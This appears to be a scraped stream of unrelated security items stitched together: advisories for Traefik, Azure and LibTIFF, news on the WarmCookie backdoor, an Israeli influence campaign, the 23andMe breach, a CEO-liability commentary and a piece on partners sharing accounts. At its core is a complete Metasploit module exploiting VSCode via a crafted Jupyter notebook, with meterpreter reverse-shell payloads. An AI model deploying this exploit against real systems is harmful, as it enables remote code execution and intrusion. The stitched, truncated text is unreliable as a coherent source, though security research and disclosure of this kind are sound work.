### Impact

There is a vulnerability in [Go managing various Is methods (IsPrivate, IsLoopback, etc) for IPv4-mapped IPv6 addresses](https://groups.google.com/g/golang-announce/c/XbxouI9gY7k/m/TuoGEhxIEwAJ).

They didn't work as expected returning false for addresses which would return true in their traditional IPv4 forms.

### References

- [CVE-2024-24790](https://www.cve.org/CVERecord?id=CVE-2024-24790)

### Patches

- https://github.com/traefik/traefik/releases/tag/v2.11.4
- https://github.com/traefik/traefik/releases/tag/v3.0.2

### Workarounds

No workaround.

### For more information

If you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-7jmw-8259-q9jx

**Traefik has unexpected behavior with IPv4-mapped IPv6 addresses**

Moderate severity GitHub Reviewed Published Jun 11, 2024 in traefik/traefik • Updated Jun 11, 2024

**Package**

gomod github.com/traefik/traefik (Go)

**Affected versions**

< 2.11.4

gomod github.com/traefik/traefik/v2 (Go)

gomod github.com/traefik/traefik/v3 (Go)

**Description**

Published to the GitHub Advisory Database

Jun 11, 2024

Last updated

Jun 11, 2024

GHSA-7jmw-8259-q9jx: Traefik has unexpected behavior with IPv4-mapped IPv6 addresses

Azure Storage Movement Client Library Denial of Service Vulnerability

**Azure Storage Movement Client Library Denial of Service Vulnerability**

High severity GitHub Reviewed Published Jun 11, 2024 to the GitHub Advisory Database • Updated Jun 11, 2024

GHSA-32f8-hmr3-7vxg: Azure Storage Movement Client Library Denial of Service Vulnerability

Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-35255

**Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability**

Moderate severity GitHub Reviewed Published Jun 11, 2024 to the GitHub Advisory Database • Updated Jun 11, 2024

**Package**

npm @azure/identity (npm)

**Affected versions**

< 4.2.1

npm @azure/msal-node (npm)

nuget Azure.Identity (NuGet)

nuget Microsoft.Identity.Client (NuGet)

maven com.azure:azure-identity (Maven)

maven com.microsoft.azure:msal4j (Maven)

gomod github.com/Azure/azure-sdk-for-go/sdk/azidentity (Go)

**Description**

Published to the GitHub Advisory Database

Jun 11, 2024

Last updated

Jun 11, 2024

GHSA-m5vv-6r4h-3vj9: Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability

The fresh-baked malware is being widely distributed, but still specifically targets individuals with tailored lures. It's poised to evolve into a bigger threat, researchers warn.

Source: Weyo via Alamy Stock Photo

A purpose-built Windows backdoor appears to be the new flavor of the month for giving attackers entry into targeted systems; after initial access, they pivot to ransomware delivery and system compromise in a wave of recent attacks.

Dubbed WarmCookie by researchers at Elastic Security Labs, the backdoor has been distributed widely in a spate of phishing emails starting in late April by a campaign called REF6127. It uses recruitment and potential jobs as lures, the researchers revealed in a blog post today.

While the malware itself isn't particularly sophisticated — it's mainly an initial backdoor tool for scouting out victim networks and deploying additional payloads — "it shouldn't be taken lightly as it's actively being used and impacting organizations at a global scale," Daniel Stepanic, Elastic Security principal security research engineer, wrote in the post.

The backdoor's code overlaps with a sample that was previously reported by eSentire, suggesting that WarmCookie may be an update to malware that already was in circulation since 2022. However, the latest version of the backdoor represents a different, more pervasive threat, Stepanic noted.

"While some features are similar, such as the implementation of string obfuscation, WarmCookie contains differing functionality," he wrote. "Our team is seeing this threat distributed daily with the use of recruiting and job themes targeting individuals.

**Targeting Specific Appetites**

Phishing lures that use job recruitment are a common theme for attackers, which have found success previously in targeting various professionals with fake promises of new employment positions. North Korean APT Lazarus is among attackers that has been particularly active with this tactic.

The emails in the REF6127 campaign put a twist on this with lures that are specific to the individuals that the attackers are targeting, the researchers said. Indeed, the campaign uses info about targets' current employers attempt to lure them with a type of position that might pique their interest, "enticing victims to pursue new job opportunities by clicking a link to an internal system to view a job description," Stepanic wrote.

In terms of the infection routine, one screenshot included in the post shows a message telling the recipient there is an "exciting opportunity" in the form of a new position open with one of the recruiter's clients. The message includes a "View Position Details" link which eventually leads to the process for deploying WarmCookie.

If a target clicks on the link, it goes to a landing page that looks like a legitimate page specifically targeted for the intended victim using his or her name, and that prompts the user to download a document by solving a CAPTCHA challenge. The landing pages used in the campaign resemble previous campaigns discovered by Google Cloud's security team in a campaign used to spread a new variant of the URSNIF malware, Stepanic noted.

Solving the CAPTCHA challenge downloads an obfuscated JavaScript file that runs PowerShell, kicking off the first task to load WarmCookie. The PowerShell script abuses the Background Intelligent Transfer Service (BITS) to download the malware and run the DLL with the Start export.

To keep defenders on their toes, attackers continuously generate new landing pages rapidly on IP address 45.9.74\[.\]135, targeting different recruiting firms in combination with keywords related to the job search industry with their malicious activity. Moreover, before hitting each landing page, "the adversary distances itself by using compromised infrastructure to host the initial phishing URL, which redirects the different landing pages," Stepanic noted.

**How the Cookie Crumbles**

WarmCookie is a two-stage "lightweight backdoor" that ultimately provides "relatively straightforward" functionality — such as retrieving victim info and screenshot recording — for monitoring victims and further deploying more damaging payloads, such as ransomware, according to the post.

In the first stage, which occurs after the PowerShell download of the malware, the backdoor sets itself up to run with System privileges from the Task Scheduler Engine. "A critical part of the infection chain comes from the scheduled task, which is set up at the very beginning of the infection," Stepanic noted. "The task name (RtlUpd) is scheduled to run every 10 minutes every day."

The malware's second stage contains the backdoor's core functionality and is one in which the DLL is combined with the command line (Start /p) to set execution in motion.

Along the way, WarmCookie uses several tactics to avoid detection. One is to protect its strings using a custom string decryption algorithm in which "the first four bytes of each encrypted string in the .rdata section represent the size, the next four-bytes represent the RC4 key, and the remaining bytes represent the string," Stephanic wrote. Developers also made the "interesting" choice not always to rotate the RC4 key between the encrypted strings.

WarmCookie also uses dynamic API loading to prevent static analysis from identifying its core functionality, and includes a few anti-analysis checks commonly used to target sandboxes "based on logic for checking the active number of CPU processors and physical/virtual memory values," he added.

**Evolving Recipes for Malware**

Elastic is urging organizations to be on the lookout for WarmCookie, which will likely evolve over time as its developers enhance it with advanced functionality.

"Our team believes this malware represents a formidable threat that provides the capability to access target environments and push additional types of malware down to victims," Stepanic wrote.

The post includes a screenshot of YARA rules that organizations use to identify the presence of WarmCookie in an environment. Elastic also specifically addresses various behavior of the backdoor — including its Powershell download and execution and Scheduled Task creation — to provide insight on how to detect this activity on an organization's network.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

WarmCookie Gives Cyberattackers Tasty New Backdoor for Initial Access

Democratic leader Hakeem Jeffries has joined US intelligence officials in ignoring repeated inquiries about Israel’s “malign” efforts to covertly influence US voters.

Federal lawmakers in the US have dodged repeated inquiries over the past week about a covert operation ordered by the Israeli government to artificially boost support among Americans for its war in Gaza. At the same time, senior White House officials charged with advising President Joe Biden on matters of national security are claiming to have no knowledge of the operation—first disclosed publicly more than four months ago.

The operation, formally tied to the Israeli government by a New York Times reporter last week, kicked off in October 2023 following the surprise attack by Hamas in southern Israel. Researchers internationally began work to expose the campaign in February, identifying a flood of “suspicious accounts” on US-based social networking apps, most masquerading as Americans avowing support for the Israeli military response.

In addition to eroding support for the United Nations Relief and Works Agency, which provides assistance to 5.6 million Palestinian refugees, a chief aim of the Israeli operation, researchers say, was to sway the opinions of Black Americans. Per the Times—which cited four current and former Israeli officials in confirming their government had commissioned the campaign—its primary targets included the account of US congressman Hakeem Jeffries, the leader of the Democrats in the House, among others who are “Black and Democratic.”

Accounts tied to the operation—many of which, at the time of writing, remain active on X, despite being suspended on other platforms—promoted a Black Lives Matter hashtag and shared images of Martin Luther King Jr. alongside fabricated quotes. A website created for the operation included articles with titles such as “The leaders of the Civil Rights Movement and Their Support of Jewish People and Israel.”

Several examples of accounts used in the operation, many of which were created weeks prior to the Hamas attack on October 7 that killed an estimated 1,200 people, advertised themselves as “Christian.” One of the stolen identities used in the operation, first identified by a researcher in Qatar, was that of Kyle Jean-Baptiste, an up-and-coming Broadway star who died in 2015 after falling from a fire escape.

**Got a Tip?**

_If you have information about the work of the intelligence community or its congressional overseers, contact Dell Cameron at dell\_cameron@wired.com or via Signal at dell.3030._

Multiple inquiries placed with senior members of Jeffries’ staff, including his communications director, Andy Eichar, have gone unacknowledged for nearly a week. WIRED has attempted to resolve whether Jeffries ever received notification of the operation from US intelligence while Congress was in the midst of debating $14 billion in funding to supplement Israel’s war effort.

Israeli forces have killed more than 36,000 Palestinians since Hamas’ October 7 attack, according to Gaza health officials’ estimates, including dozens last Thursday at a United Nations school compound, where the Israeli military is accused of making “improper use” of a US-made bomb.

With the exception of the White House’s National Security Council, which on Thursday claimed to have no knowledge of the operation, and Senate Intelligence Committee chair Mark Warner, whose office told WIRED it planned to request a briefing on the matter, press inquiries concerning Israel’s attempts to secretly influence US opinion on the war have been met with a stonewall.

It is unclear whether Biden may have received a briefing on the operation that included information not shared with his own national security advisers. Said a spokesperson for the National Security Council: “We take all allegations of foreign malign influence seriously.”

The Office of the Director of National Intelligence, led by Avril Haines—formerly No. 2 at the CIA—declined to say whether US intelligence had any knowledge of the operation prior to the June 5 New York Times’ story. It would not reveal whether it issued any notifications to Jeffries or any other US officials targeted by Israel.

The ODNI maintains what it calls a “disclosure framework” for notifying victims of influence operations connected with US elections. It is unclear, however, whether the ODNI considers the operation election-related, despite national elections approaching and the deep political divide among US voters over Congress’ support for the Israeli war effort.

Haines has previously spoken publicly on how US intelligence responds to this scenario: “When relevant intelligence is collected concerning a foreign influence operation aimed at our election,” she said, a “notification framework” exists to ensure “appropriate notice is given to those who are being targeted so that they can take action.”

Multiple attempts to solicit comment over the past week from the House Intelligence Committee have likewise gone unacknowledged by representatives Mike Turner and Jim Himes, the committee’s chair and ranking member, respectively. It is unclear whether they are taking steps similar to their Senate counterparts to investigate the matter.

Many of the Israeli operation’s fake posts were found to have been generated using ChatGPT, the digital assistant software developed by OpenAI, which is being integrated into everything from Apple’s new iPhones to the next Microsoft Windows operating system. Notably, OpenAI’s CEO, Sam Altman, was recently appointed an adviser to the Homeland Security Department. According to the agency, his role is to advise the US government on how to “prevent and prepare for AI-related disruptions.”

Both OpenAI and social media giant Meta have publicly confirmed that the operation was launched by a Tel Aviv–based company called Stoic. Neither US company, however, has disclosed having any knowledge of Stoic being commissioned by the Israeli government.

Oft described as an Israeli “campaign marketing firm,” Stoic is reminiscent of Russia’s Internet Research Agency, which similarly used fake accounts registered on social media to promote the Kremlin’s interests, namely by working to influence the outcome of the 2016 US presidential election. OpenAI disclosed earlier this month that Stoic had similarly been tracked using fraudulent accounts in an effort to influence the outcome of India’s recent elections.

Meta and OpenAI have not responded to requests for comment.

A US intelligence assessment published in February that identified threats from foreign countries accused of launching malign influence operations against the US references Israel dozens of times; however, it strictly portrays the Middle East ally as the victim of such campaigns.

The annual assessment, published by the ODNI three days after Israel’s “multi-platform deception operation” was first revealed publicly by Marc Owen Jones—an assistant professor of Qatar University specializing in disinformation—speaks only broadly of the influence efforts of US rivals and contains few if any details about any specific operations. The report mentions, for instance, that the Chinese government “reportedly targeted” US politicians on TikTok using accounts run by a propaganda office ahead of the 2022 midterm elections.

The revelation of Israel’s involvement follows months of hearings in Washington concerning the impact of what US intelligence calls “malign foreign influence campaigns.” Much of the focus by lawmakers centered on allegations that China might potentially manipulate TikTok to sway public opinion in the US.

Jeffries, who is rumored to be the Democratic party’s next choice to become Speaker of the House, was among the 360 US representatives to support taking drastic steps in April that may soon lead to a ban on TikTok in US app stores.

Jeffries has joined other US leaders in extending an invitation to Israeli prime minister Benjamin Netanyahu to address Congress next month. A letter from Jeffries and Senate minority leader Mitch McConnell to the prime minister last week read: “To build on our enduring relationship and to highlight America's solidarity with Israel, we invite you to share the Israeli government's vision for defending democracy, combatting terror, and establishing a just and lasting peace in the region.”

_Update 1 pm ET, June 11, 2024: Added additional details about the Israeli influence campaign._

US Leaders Dodge Questions About Israel’s Influence Campaign

If CEOs want to avoid being the target of government enforcement actions, they need to take a personal interest in ensuring that their corporation invests in cybersecurity.

Joe Sullivan, CEO, Ukraine Friends, & CEO, Joe Sullivan Security LLC

June 11, 2024

5 Min Read

Source: Michael Burrell via Alamy Stock Photo

COMMENTARY

One day soon, a government agency will very publicly seek to hold a corporate CEO personally liable for a failure to ensure their organization invested sufficiently in cybersecurity. The surprising thing won't be that it happens, but rather how many people who work for and look up to the CEO will be happy when it does.

When a company gets hacked, the real costs often land on consumers. The company's stock price typically rebounds quickly, but end users are left with their identities stolen, accounts locked, money lost, or children exposed to harm.

The consumers who are harmed from breaches rightfully expect our governments to protect us. The contract between people and their governments is simple: We contribute some of our wealth and you keep us safe. That model has worked pretty well for centuries.

But things have gotten a lot more complicated in the Internet age. Our digital fingerprints are held in the hands of private companies. In the name of personal privacy, we don't want our governments to have that level of access to and control of that information. So, the government can't solely protect us, and companies aren't properly incented to do it either. It's a unique catch-22: No single entity has the power to protect us on the Internet.

Something must give, which is why we're experiencing a movement toward regulation by enforcement. The trend has been developing over the past decade, since the Obama administration developed a policy instructing prosecutors to expand enforcement actions against "responsible corporate officers,” on the theory that the best way to encourage better corporate behavior is to bring actions directly against executives.

The Biden administration has now taken that approach to cyberspace. Look no further than the National Cybersecurity Strategy, which, at its core, demands that corporate America do more to protect citizens from cyberattacks. Realizing it cannot stop cyber harm by asking for voluntary cooperation from companies, it is also using the enforcement tools it believes it has under existing law to force changes in behaviors. A current example is the Securities and Exchange Commission's (SEC) action against the software company SolarWinds and its head of security. The case has raised eyebrows, specifically because the security leader was sued personally.

**Why the CEO Is Next**

Inside every major company is a security team full of smart, technically savvy professionals dedicated to fighting criminals and despotic governments to protect their customers. Most are understaffed and push hard for more investments to make their jobs easier. Leading those teams are senior security practitioners, many of whom are not given the title of chief information security officer (CISO). And recently, our government has turned its enforcement eye toward those team leaders.

As the government digs into these types of cases more deeply, it's inevitable it will conclude it was a mistake to target the greatest champion for the public inside a company. The current focus on security leaders is flawed because it assumes that rather than delivering security at the highest standards, these leaders have instead chosen to mislead. In response, nearly every CISO I talk to is worried about being held personally accountable for a lack of corporate investment. Some great CISOs are now stepping out of the role because their desire to help others is losing out to their desire for self-preservation.

With very few exceptions, the CISO or senior-most security leader is simply not the "responsible corporate officer.” It's the CEO. Security leaders rarely, if ever, get the budget needed to do their job well. CEOs and boards that do control the corporate budget rarely invest the time to understand their cyber-risks, and instead allocate resources in other directions.

The government's attention has already started to shift toward the CEO. At the final hearing in the case in which I was charged with covering up a security incident at Uber, the judge made it a point to challenge the Department of Justice and ask why the CEO was not brought to court. The Federal Trade Commission (FTC) reached the same conclusion and entered into a settlement with the CEO of Drizly for failing to invest adequately in security. The Cybersecurity and Infrastructure Security Agency (CISA) now asks that CEOs, not CISOs, sign its pledge to use secure by design principles when selling software when selling software. And the SEC will see it when it peels back the layers and reviews what happened during budget time at SolarWinds. It will realize it is not enough to look at how a security team responded to an incident or tried to prevent it. To assign culpability, it must look at how the company allocated resources from the top down. Sen. Ron Wyden (D-Ore.), in his recent letter to the FTC and SEC, also asked them to focus on the CEO level when investigating the United Health Group over the Change Healthcare ransomware case.

Security leaders are starting to ask more forcefully for resources. When they fail to receive them, they are documenting those budget decisions clearly. They are also pushing forward policies that bring CEOs and other executives more directly into cyber-incident response processes and deploying new products like those from BreachRx (full disclosure: I've recently joined the company as a senior advisor) that document how security incidents are handled in a cross-functional manner. All these steps will make it easier to show that the security leader wasn't standing alone or, in many cases, even involved in the decisions that led to consumers getting hurt.

Ultimately, the only way the CEO avoids being the target of government enforcement actions is if he or she takes a personal interest in ensuring that the corporation invests properly in cybersecurity.

**About the Author(s)**

CEO, Ukraine Friends, & CEO, Joe Sullivan Security LLC

Joe Sullivan provides security, AI safety, and leadership advice to executives across various industries and serves as the CEO of Ukraine Friends, a nonprofit providing humanitarian aid to Ukrainian children in a war zone. Joe spent eight years with the US Department of Justice, including as the first federal prosecutor dedicated to prosecuting technology-related crimes. He then spent seven years in senior roles at eBay and PayPal, before joining Facebook in 2008 as its chief security officer, building its safety and security team from a handful of people to hundreds. In 2015, he joined Uber as its first CSO, and in 2018, Cloudflare as its first CSO, helping it blossom from pre-IPO to a thriving public company. Joe has advised many companies, including AirBnB, DoorDash, and Whoop, and currently advises nine pre-IPO companies. He has testified before global government bodies, and served on President Obama’s Commission on Enhancing National Cybersecurity.

The CEO Is Next

VSCode when opening a Jupyter notebook (.ipynb) file bypasses the trust model. On versions v1.4.0 through v1.71.1, its possible for the Jupyter notebook to embed HTML and javascript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. During testing, the first open of the Jupyter notebook resulted in pop-ups displaying errors of unable to find the payload exe file. The second attempt at opening the Jupyter notebook would result in successful execution. Successfully tested against VSCode 1.70.2 on Windows 10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpServer  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VSCode ipynb Remote Development RCE',        'Description' => %q{          VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.          On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed          HTML and javascript, which can then open new terminal windows within VSCode.          Each of these new windows can then execute arbitrary code at startup.          During testing, the first open of the Jupyter notebook resulted in pop-ups          displaying errors of unable to find the payload exe file. The second attempt          at opening the Jupyter notebook would result in successful exeuction.          Successfully tested against VSCode 1.70.2 on Windows 10.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # metasploit module          'Zemnmez'        ],        'References' => [          ['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],          ['CVE', '2022-41034'],          ['URL', 'https://github.com/andyhsu024/CVE-2022-41034']        ],        'DisclosureDate' => '2022-11-22',        'Privileged' => false,        'Arch' => ARCH_CMD,        'Stance' => Stance::Aggressive,        'Payload' => { 'BadChars' => '&"' },        'Targets' => [          [            'Windows',            {              'Platform' => 'win',              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Linux File-Dropper',            {              'Platform' => 'linux',              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'WfsDelay' => 3_600, # 1hr          'URIPATH' => 'project.ipynb'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          # on windows it will say the final payload can't be found          # however, it is, seems to be a timing issue, 2nd exploit attempt          # works perfectly          'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],          'SideEffects' => [SCREEN_EFFECTS]        }      )    )    register_options(      [        OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),        OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),      ]    )  end  def check    CheckCode::Unsupported  end  def exploit    unless datastore['URIPATH'].end_with? '.ipynb'      fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')    end    print_status('Starting up web service...')    start_service    sleep(datastore['WFSDELAY'])  end  def on_request_uri(cli, request)    super unless request.uri.end_with? datastore['URIPATH']    if target['Platform'] == 'win'      config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }    else      config = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }    end    pload = JSON.dump({ 'config' => config })    pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it works    ipynb = %|{"cells": [  {  "cell_type": "markdown",  "metadata": {},  "source": [    "<img src=a onerror=\\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\\"/>"  ]  }]}|    send_response(cli, ipynb, {      'Connection' => 'close',      'Pragma' => 'no-cache',      'Access-Control-Allow-Origin' => '*'    })    print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")  endend

VSCode ipynb Remote Code Execution

Ubuntu Security Notice 6827-1 - It was discovered that LibTIFF incorrectly handled memory when performing certain cropping operations, leading to a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6827-1  
June 11, 2024

tiff vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

LibTIFF could be made to crash if it opened a specially crafted  
file.

Software Description:  
- tiff: Tag Image File Format (TIFF) library

Details:

It was discovered that LibTIFF incorrectly handled memory when  
performing certain cropping operations, leading to a heap buffer  
overflow. An attacker could possibly use this issue to cause a  
denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   libtiff-opengl                  4.5.1+git230720-4ubuntu2.1  
   libtiff-tools                   4.5.1+git230720-4ubuntu2.1  
   libtiff6                        4.5.1+git230720-4ubuntu2.1  
   libtiffxx6                      4.5.1+git230720-4ubuntu2.1

Ubuntu 23.10  
   libtiff-opengl                  4.5.1+git230720-1ubuntu1.2  
   libtiff-tools                   4.5.1+git230720-1ubuntu1.2  
   libtiff6                        4.5.1+git230720-1ubuntu1.2  
   libtiffxx6                      4.5.1+git230720-1ubuntu1.2

Ubuntu 22.04 LTS  
   libtiff-opengl                  4.3.0-6ubuntu0.9  
   libtiff-tools                   4.3.0-6ubuntu0.9  
   libtiff5                        4.3.0-6ubuntu0.9  
   libtiffxx5                      4.3.0-6ubuntu0.9

Ubuntu 20.04 LTS  
   libtiff-tools                   4.1.0+git191117-2ubuntu0.20.04.13  
   libtiff5                        4.1.0+git191117-2ubuntu0.20.04.13

Ubuntu 18.04 LTS  
   libtiff-opengl                  4.0.9-5ubuntu0.10+esm6  
                                   Available with Ubuntu Pro  
   libtiff-tools                   4.0.9-5ubuntu0.10+esm6  
                                   Available with Ubuntu Pro  
   libtiff5                        4.0.9-5ubuntu0.10+esm6  
                                   Available with Ubuntu Pro  
   libtiffxx5                      4.0.9-5ubuntu0.10+esm6  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   libtiff-opengl                  4.0.6-1ubuntu0.8+esm16  
                                   Available with Ubuntu Pro  
   libtiff-tools                   4.0.6-1ubuntu0.8+esm16  
                                   Available with Ubuntu Pro  
   libtiff5                        4.0.6-1ubuntu0.8+esm16  
                                   Available with Ubuntu Pro  
   libtiffxx5                      4.0.6-1ubuntu0.8+esm16  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   libtiff-opengl                  4.0.3-7ubuntu0.11+esm13  
                                   Available with Ubuntu Pro  
   libtiff-tools                   4.0.3-7ubuntu0.11+esm13  
                                   Available with Ubuntu Pro  
   libtiff5                        4.0.3-7ubuntu0.11+esm13  
                                   Available with Ubuntu Pro  
   libtiffxx5                      4.0.3-7ubuntu0.11+esm13  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6827-1  
   CVE-2023-3164

Package Information:  
   https://launchpad.net/ubuntu/+source/tiff/4.5.1+git230720-4ubuntu2.1  
   https://launchpad.net/ubuntu/+source/tiff/4.5.1+git230720-1ubuntu1.2  
   https://launchpad.net/ubuntu/+source/tiff/4.3.0-6ubuntu0.9  
   https://launchpad.net/ubuntu/+source/tiff/4.1.0+git191117-2ubuntu0.20.04.13

Ubuntu Security Notice USN-6827-1

Canada's and UK privacy authorities are going to investigate the data breach at 23andMe to assess what the company could have done better.

The British and Canadian privacy authorities have announced they will undertake a joint investigation into the data breach at global genetic testing company 23andMe that was discovered in October 2023.

On Friday October 6, 2023, 23andMe confirmed via a somewhat opaque blog post that cybercriminals had “obtained information from certain accounts, including information about users’ DNA Relatives profiles.”

Later, an investigation by 23andMe showed that an attacker was able to directly access the accounts of roughly 0.1% of 23andMe’s users, which is about 14,000 of its 14 million customers. The attacker accessed the accounts using credential stuffing which is where someone tries existing username and password combinations to see if they can log in to a service. These combinations are usually stolen from another breach and then put up for sale on the dark web. Because people often reuse passwords across accounts, cybercriminals buy those combinations and then use them to login on other services and platforms.

For a subset of these accounts, the stolen data contained health-related information based on the user’s genetics.

The finding that most data was accessed through credential stuffing led to 23andMe sending a letter to legal representatives of victims blaming the victims themselves.

Privacy Commissioner of Canada Philippe Dufresne and UK Information Commissioner John Edwards say they will investigate the 23andMe breach jointly, leveraging the combined resources and expertise of their two offices.

The privacy watchdogs are going to investigate:

> *   the scope of information that was exposed by the breach and potential harms to affected individuals;
> *   whether 23andMe had adequate safeguards to protect the highly sensitive information within its control; and
> *   whether the company provided adequate notification about the breach to the two regulators and affected individuals as required under Canadian and UK privacy and data protection laws.               

The joint investigation will be conducted in accordance with the Memorandum of Understanding between the ICO and OPC.

**Scan for your exposed personal data**

You can check what personal information of yours has been exposed online with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report. If your data was part of the 23andMe breach, we’ll let you know.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 23andMe data breach under joint investigation in two countries 

Digital sharing is the norm in romantic relationships. But some access could leave partners vulnerable to inconvenience, spying, and abuse.

“When things go wrong” is a troubling prospect for most couples to face, but the internet—and the way that romantic partners engage both with and across it—could require that this worst-case scenario become more of a best practice.

In new research that Malwarebytes will release this month, romantic partners revealed that the degree to which they share passwords, locations, and devices with one another can invite mild annoyances—like having an ex mooch off a shared Netflix account—serious invasions of privacy—like being spied on through a smart doorbell—and even stalking and abuse.

Importantly, this isn’t just about jilted exes. This is also about people in active, committed relationships who have been pressured or forced into digital sharing beyond their limit.

The proof is in the data.

When Malwarebytes surveyed 500 people in committed relationships, 30% said they regretted sharing location tracking with their partner, 27% worried about their partners tracking them through location-based apps and services, and 23% worried that their current partner had accessed their accounts without their permission.

Plenty of healthy, happy relationships share digital access through trust and consent. For those couples, mapping out how to digitally separate and insulate their accounts from one another “when things go wrong” could seem misguided.

But for the many spouses, girlfriends, boyfriends, and partners who do not fully trust their significant other—or who are still figuring out how much to trust someone new—this exercise should serve as an act of security.

Here’s what people can think about when working through just how much of their digital lives to share.

****Inconvenient, annoying, and just plain bothersome****

A great deal of digital sharing within couples occurs on streaming platforms. One partner has Netflix, the other has Hulu, the two share Disney+, and years down the line, the couple can’t quite tell who is in charge of Apple Music and who is supposed to cancel the one-week free trial to Peacock.

This logistical nightmare, already difficult for people who are not in a committed relationship, is further complicated after a breakup (or during the relationship if one partner is particularly sensitive about their weekly algorithmic recommendations from Spotify).

If an ex maintains access to your streaming accounts even after a breakup, there’s little chance for abuse, but the situation can be aggravating. Maybe you don’t want your ex to know that you’re watching corny rom-coms, or that you’re absolutely going through it on your seventh replay of Spotify’s “Angry Breakup Mix.” These are valid annoyances that will require a password reset to boot your ex out of the shared account.

But there’s one type of shared account that should raise more caution than those listed above: A shared online shopping account, like Amazon.

With access to a shared online shopping account, a spiteful ex could purchase goods using your saved credit card. They could also keep updates on your location should you ever move and change addresses in the app. This isn’t the same threat as an ex having your real-time location, but for some individuals—particularly survivors of domestic abuse who have escaped their partner—any leak of a new address presents a major risk.

****Non-consensual tracking, monitoring, and spying****

When couples move into the same home, it can make sense to start sharing a variety of location-based apps.

Looking for a vacation rental online for your next getaway? You’re (hopefully) lodging together. Ordering delivery because nobody wants to make dinner? That order is being sent to the same shared address. Even some credit cards offer specific bonuses on services like Lyft, incentivizing some couples to rely more heavily on one account to score extra credits.

While sharing access between these types of accounts can increase efficiency, it’s important to know—and this may sound obvious—that many of these same shared location-based apps can reveal locations to a romantic partner, even after a breakup.

Your vacation could be revealed to an ex who is abusing their previously shared login privileges into services like Airbnb or Vrbo, or by someone peering into the trip history of a shared Uber account that discloses that a car was recently taken to the airport. Food delivery apps, similarly, can reveal new addresses after a move—a particular risk for survivors of domestic abuse who are trying to escape their physical situation.

In fact, any account that tracks and provides access to location—including Google’s own “Timeline” feature and fitness tracking devices made by Strava—could, in the wrong hands, become a security risk for stalking and abuse.

The vulnerabilities extend farther.

